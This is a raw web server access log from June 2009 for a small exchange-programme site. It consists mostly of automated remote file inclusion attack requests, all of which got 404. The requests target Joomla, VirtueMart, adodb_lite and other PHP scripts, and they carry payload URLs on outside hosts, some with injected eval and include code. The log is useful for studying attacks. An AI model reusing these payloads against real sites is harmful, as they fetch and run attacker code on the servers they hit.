86.109.109.87 - - [29/Jun/2009:18:51:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:53:06 -0700] "GET /logs/access.log%20///vwar/backup/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:57:44 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
74.6.17.172 - - [29/Jun/2009:19:17:17 -0700] "GET /sitebuilder/?M=A HTTP/1.0" 200 520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.17.172 - - [29/Jun/2009:19:31:57 -0700] "GET /sitebuilder/?S=A HTTP/1.0" 200 520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:24 -0700] "GET /logs/access_090420.log/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:24 -0700] "GET /main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:24 -0700] "GET /logs/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:26 -0700] "GET /logs/access_090420.log/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:26 -0700] "GET /main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:26 -0700] "GET /logs/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:29 -0700] "GET /logs/access_090420.log/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:29 -0700] "GET /main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:34:29 -0700] "GET /logs/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:36:32 -0700] "GET /logs/access_090420.log%20%20/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:37:52 -0700] "GET /logs/access_090420.log%20%20/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:19:37:55 -0700] "GET /logs/access_090420.log%20%20/main.php?sayfa=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:23 -0700] "GET /logs/access_081222.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:25 -0700] "GET /logs/access_081222.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:26 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:43:26 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:45:00 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.26.40 - - [29/Jun/2009:19:45:00 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:54:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:54:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:19 -0700] "GET /logs/access_090420.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:20 -0700] "GET /logs/access_090420.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:55:49 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:19:57:41 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:00:35 -0700] "GET /logs/access_090105.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:00:35 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:00:36 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:01:31 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:02:26 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
211.189.39.159 - - [29/Jun/2009:20:02:27 -0700] "GET /include/admin.lib.inc.php?site_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.39.159 - - [29/Jun/2009:20:02:27 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.39.159 - - [29/Jun/2009:20:02:27 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:03:49 -0700] "GET /logs/access_090105.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:03:49 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:03:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:10 -0700] "GET /logs/access_090420.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:11 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:26 -0700] "GET /logs/access_090420.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:26 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:05:26 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:06:19 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:26 -0700] "GET /logs/access_081109.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:26 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:26 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:27 -0700] "GET /logs/access_081109.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:27 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:06:27 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:03 -0700] "GET /logs/access_090420.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:03 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:04 -0700] "GET /logs/access_090420.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:04 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:07:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
83.98.209.71 - - [29/Jun/2009:20:08:04 -0700] "GET /logs///vwar/backup/errors.php?error=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
83.98.209.71 - - [29/Jun/2009:20:08:05 -0700] "GET //vwar/backup/errors.php?error=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:11:12 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:11:20 -0700] "GET /logs/access_081109.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:11:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:11:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.64.88 - - [29/Jun/2009:20:11:42 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:13:14 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
65.23.158.226 - - [29/Jun/2009:20:13:48 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:14:14 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
218.234.21.178 - - [29/Jun/2009:20:14:17 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:14:52 -0700] "GET /logs/access_090420.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:14:52 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:14:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
91.198.32.3 - - [29/Jun/2009:20:24:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tiny.webreference.de/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.198.32.3 - - [29/Jun/2009:20:24:19 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tiny.webreference.de/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.198.32.3 - - [29/Jun/2009:20:24:19 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tiny.webreference.de/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.205.57.2 - - [29/Jun/2009:20:25:27 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.55.106.228 - - [29/Jun/2009:20:27:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:20:36:51 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:20:36:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:20:36:51 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:20:38:06 -0700] "GET /logs/access.log%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:20:38:33 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:20:38:34 -0700] "GET /logs/access.log%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:20:38:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:20:39:35 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:20:39:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:20:39:35 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:20:40:29 -0700] "GET /logs/access.log%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:20:54:48 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
